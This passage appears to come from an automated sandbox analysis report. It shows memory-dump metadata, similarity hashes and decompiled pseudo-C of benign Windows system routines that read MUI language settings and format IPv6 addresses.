                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                        • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                        • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                        • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FE24, Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                        • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                        • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                        • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FFFC, Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                        • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                        • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                        • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FF34, Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                        • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                        • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                        • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B68788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E00B68788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00B68460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00B4E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00B6718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00B68460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00B6718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00B68460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00B68460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00B68460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00B6718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00B4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00B42340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00B5E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00B4E2A8(_t322,  &_v68, _v16);
								if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00B5E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00B4E2A8(_t322,  &_v68, _t236);
								if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00B6718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00B4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00B42340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00B5E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00B4E2A8(_v12,  &_v68, _v16);
							if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00B5E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00B4E2A8(_t322,  &_v68, _t269);
							if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00B6718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00B4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00B42340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00B5E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00B4E2A8(_v12,  &_v68, _v16);
						if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00B5E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00B4E2A8(_t322,  &_v68, _t296);
						if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                        0x00b68788
                                                        0x00b68788
                                                        0x00b68791
                                                        0x00b68794
                                                        0x00b68798
                                                        0x00b6879b
                                                        0x00b6879e
                                                        0x00b687a1
                                                        0x00b687a4
                                                        0x00b687a7
                                                        0x00b687aa
                                                        0x00b687af
                                                        0x00bb1ad3
                                                        0x00b68b0a
                                                        0x00b68b0d
                                                        0x00b68b13
                                                        0x00b68b19
                                                        0x00b68b1f
                                                        0x00b68b25
                                                        0x00b68b2b
                                                        0x00b68b31
                                                        0x00b68b37
                                                        0x00b68b3d
                                                        0x00b68b46
                                                        0x00b68b46
                                                        0x00b687c6
                                                        0x00b687d0
                                                        0x00bb1ae0
                                                        0x00bb1ae6
                                                        0x00bb1af8
                                                        0x00bb1af8
                                                        0x00bb1afd
                                                        0x00bb1afe
                                                        0x00bb1b01
                                                        0x00bb1b06
                                                        0x00bb1b06
                                                        0x00b687d6
                                                        0x00b687f2
                                                        0x00b687f7
                                                        0x00b68807
                                                        0x00b6880a
                                                        0x00b6880f
                                                        0x00b68810
                                                        0x00b68813
                                                        0x00b68818
                                                        0x00b68818
                                                        0x00b6882c
                                                        0x00b68831
                                                        0x00b68838
                                                        0x00b68908
                                                        0x00b68920
                                                        0x00b689f0
                                                        0x00b68a08
                                                        0x00b68af6
                                                        0x00b68af6
                                                        0x00b68af8
                                                        0x00b68afb
                                                        0x00bb1beb
                                                        0x00bb1beb
                                                        0x00b68b04
                                                        0x00bb1bf8
                                                        0x00bb1c0e
                                                        0x00bb1c13
                                                        0x00bb1c16
                                                        0x00bb1c16
                                                        0x00bb1bf8
                                                        0x00000000
                                                        0x00b68b04
                                                        0x00b68a0e
                                                        0x00b68a11
                                                        0x00b68a14
                                                        0x00b68a15
                                                        0x00b68a18
                                                        0x00b68a22
                                                        0x00b68b59
                                                        0x00b68a28
                                                        0x00b68a3c
                                                        0x00b68a3c
                                                        0x00b68a42
                                                        0x00bb1bb0
                                                        0x00bb1b11
                                                        0x00bb1b11
                                                        0x00000000
                                                        0x00b68a48
                                                        0x00b68a51
                                                        0x00b68a5b
                                                        0x00b68a5e
                                                        0x00b68a61
                                                        0x00b68a69
                                                        0x00b68a69
                                                        0x00b68a6d
                                                        0x00000000
                                                        0x00000000
                                                        0x00b68a74
                                                        0x00b68a7c
                                                        0x00b68a7d
                                                        0x00b68a91
                                                        0x00b68a93
                                                        0x00b68a93
                                                        0x00b68a98
                                                        0x00b68a9b
                                                        0x00b68aa1
                                                        0x00b68aa1
                                                        0x00b68aa4
                                                        0x00b68aaa
                                                        0x00b68ab1
                                                        0x00b68ac5
                                                        0x00b68ac7
                                                        0x00b68ac7
                                                        0x00b68ac5
                                                        0x00b68ace
                                                        0x00bb1bc9
                                                        0x00bb1bce
                                                        0x00bb1bd2
                                                        0x00bb1bd2
                                                        0x00b68ad8
                                                        0x00b68aeb
                                                        0x00b68aeb
                                                        0x00b68af0
                                                        0x00b68af4
                                                        0x00000000
                                                        0x00b68af4
                                                        0x00b68a42
                                                        0x00b68926
                                                        0x00b68929
                                                        0x00b6892c
                                                        0x00b6892d
                                                        0x00b68930
                                                        0x00b68935
                                                        0x00b6893a
                                                        0x00b68b51
                                                        0x00b68940
                                                        0x00b68954
                                                        0x00b68954
                                                        0x00b6895a
                                                        0x00bb1b63
                                                        0x00000000
                                                        0x00b68960
                                                        0x00b68969
                                                        0x00b68973
                                                        0x00b68976
                                                        0x00b68979
                                                        0x00b6897e
                                                        0x00b68981
                                                        0x00b68981
                                                        0x00b68986
                                                        0x00000000
                                                        0x00000000
                                                        0x00bb1b6e
                                                        0x00bb1b74
                                                        0x00bb1b7b
                                                        0x00bb1b8f
                                                        0x00bb1b91
                                                        0x00bb1b91
                                                        0x00bb1b99
                                                        0x00bb1b9c
                                                        0x00bb1ba2
                                                        0x00bb1ba2
                                                        0x00b6898c
                                                        0x00b68992
                                                        0x00b68999
                                                        0x00b689ad
                                                        0x00bb1ba8
                                                        0x00bb1ba8
                                                        0x00b689ad
                                                        0x00b689b6
                                                        0x00b689c8
                                                        0x00b689cd
                                                        0x00b689d0
                                                        0x00b689d0
                                                        0x00b689d6
                                                        0x00b689e8
                                                        0x00b689e8
                                                        0x00b689ed
                                                        0x00000000
                                                        0x00b689ed
                                                        0x00b6895a
                                                        0x00b6883e
                                                        0x00b68841
                                                        0x00b68844
                                                        0x00b68845
                                                        0x00b68848
                                                        0x00b6884d
                                                        0x00b68852
                                                        0x00b68b49
                                                        0x00b68858
                                                        0x00b6886c
                                                        0x00b6886c
                                                        0x00b68872
                                                        0x00bb1b0e
                                                        0x00000000
                                                        0x00b68878
                                                        0x00b68881
                                                        0x00b6888b
                                                        0x00b6888e
                                                        0x00b68891
                                                        0x00b68896
                                                        0x00b68899
                                                        0x00b68899
                                                        0x00b6889e
                                                        0x00000000
                                                        0x00000000
                                                        0x00bb1b21
                                                        0x00bb1b27
                                                        0x00bb1b2e
                                                        0x00bb1b42
                                                        0x00bb1b44
                                                        0x00bb1b44
                                                        0x00bb1b4c
                                                        0x00bb1b4f
                                                        0x00bb1b55
                                                        0x00bb1b55
                                                        0x00b688a4
                                                        0x00b688aa
                                                        0x00b688b1
                                                        0x00b688c5
                                                        0x00bb1b5b
                                                        0x00bb1b5b
                                                        0x00b688c5
                                                        0x00b688ce
                                                        0x00b688e0
                                                        0x00b688e5
                                                        0x00b688e8
                                                        0x00b688e8
                                                        0x00b688ee
                                                        0x00b68900
                                                        0x00b68900
                                                        0x00b68905
                                                        0x00000000
                                                        0x00b68905

                                                        APIs
                                                        Strings
                                                        • Kernel-MUI-Language-SKU, xrefs: 00B689FC
                                                        • Kernel-MUI-Language-Allowed, xrefs: 00B68827
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00B68914
                                                        • WindowsExcludedProcs, xrefs: 00B687C1
                                                        • Kernel-MUI-Number-Allowed, xrefs: 00B687E6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: _wcspbrk
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 402402107-258546922
                                                        • Opcode ID: 4b1667188243e30cd696b7fa4f92352ad18428568e0c9c2ad77a74bcbad1ccb3
                                                        • Instruction ID: f23902d790b1697aa9376a99a9497f5c684de302deb716618c5d6d6db3c50100
                                                        • Opcode Fuzzy Hash: 4b1667188243e30cd696b7fa4f92352ad18428568e0c9c2ad77a74bcbad1ccb3
                                                        • Instruction Fuzzy Hash: 2AF1D3B2D00209EFCF11DF98C981AEEBBF8FB08300F1445AAE515A7251EB75DA45DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 38%
                                                        			E00B813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00B77707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xb42926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00B77707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xb49cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00B77707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00B77707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00B77707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00B77707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                        0x00b813d5
                                                        0x00b813d9
                                                        0x00b813dc
                                                        0x00b813de
                                                        0x00b813e1
                                                        0x00b813e8
                                                        0x00b813ee
                                                        0x00bae8fd
                                                        0x00000000
                                                        0x00bae921
                                                        0x00bae921
                                                        0x00bae928
                                                        0x00bae982
                                                        0x00bae98a
                                                        0x00000000
                                                        0x00bae99a
                                                        0x00bae99e
                                                        0x00bae9a3
                                                        0x00bae9a8
                                                        0x00bae9b9
                                                        0x00bae978
                                                        0x00000000
                                                        0x00bae978
                                                        0x00bae98a
                                                        0x00bae92a
                                                        0x00bae931
                                                        0x00bae944
                                                        0x00bae944
                                                        0x00bae950
                                                        0x00bae954
                                                        0x00bae959
                                                        0x00bae95e
                                                        0x00bae963
                                                        0x00bae970
                                                        0x00000000
                                                        0x00bae975
                                                        0x00bae93b
                                                        0x00bae980
                                                        0x00000000
                                                        0x00bae980
                                                        0x00bae942
                                                        0x00bae94b
                                                        0x00000000
                                                        0x00bae94b
                                                        0x00000000
                                                        0x00bae942
                                                        0x00b813f4
                                                        0x00b813f4
                                                        0x00b813f9
                                                        0x00b813fc
                                                        0x00b813ff
                                                        0x00b81406
                                                        0x00bae9cc
                                                        0x00bae9d2
                                                        0x00bae9d2
                                                        0x00bae9cc
                                                        0x00b8140c
                                                        0x00b81411
                                                        0x00b81431
                                                        0x00b8143a
                                                        0x00b8143c
                                                        0x00b8143f
                                                        0x00b8143f
                                                        0x00b81442
                                                        0x00b81447
                                                        0x00b814a8
                                                        0x00b814ac
                                                        0x00bae9e2
                                                        0x00bae9e7
                                                        0x00bae9ec
                                                        0x00baea05
                                                        0x00baea05
                                                        0x00000000
                                                        0x00b81449
                                                        0x00000000
                                                        0x00b81449
                                                        0x00b8144c
                                                        0x00b81459
                                                        0x00b81462
                                                        0x00b81469
                                                        0x00b8146a
                                                        0x00b81470
                                                        0x00b81473
                                                        0x00b81476
                                                        0x00b81476
                                                        0x00b81490
                                                        0x00b81495
                                                        0x00b8138e
                                                        0x00b81390
                                                        0x00b81397
                                                        0x00b81398
                                                        0x00b81399
                                                        0x00b813a1
                                                        0x00b813a4
                                                        0x00b813a4
                                                        0x00b81498
                                                        0x00b8149c
                                                        0x00b8149f
                                                        0x00b814a2
                                                        0x00000000
                                                        0x00000000
                                                        0x00b814a4
                                                        0x00000000
                                                        0x00b814a4
                                                        0x00b81413
                                                        0x00b81415
                                                        0x00b81416
                                                        0x00b81419
                                                        0x00b8141c
                                                        0x00b81422
                                                        0x00b813b7
                                                        0x00b813bc
                                                        0x00b813bf
                                                        0x00b813bf
                                                        0x00b813c2
                                                        0x00b81424
                                                        0x00b81424
                                                        0x00b81424
                                                        0x00b81427
                                                        0x00b8142b
                                                        0x00b8142c
                                                        0x00b8142c
                                                        0x00b8142c
                                                        0x00000000
                                                        0x00b8141c
                                                        0x00b81411

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 9e90dae71d72478fa5715dbd458c797150a3711a8526268684392413ddde9e20
                                                        • Instruction ID: 332373df834e7a34b17b2b5d7973265f6ef2bd857e7da91f57264a5686d611fe
                                                        • Opcode Fuzzy Hash: 9e90dae71d72478fa5715dbd458c797150a3711a8526268684392413ddde9e20
                                                        • Instruction Fuzzy Hash: AD6147B1904655AACB24EF5DC8808BF7BF9EF95300B18C8ADF4AA47650D634AA41DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

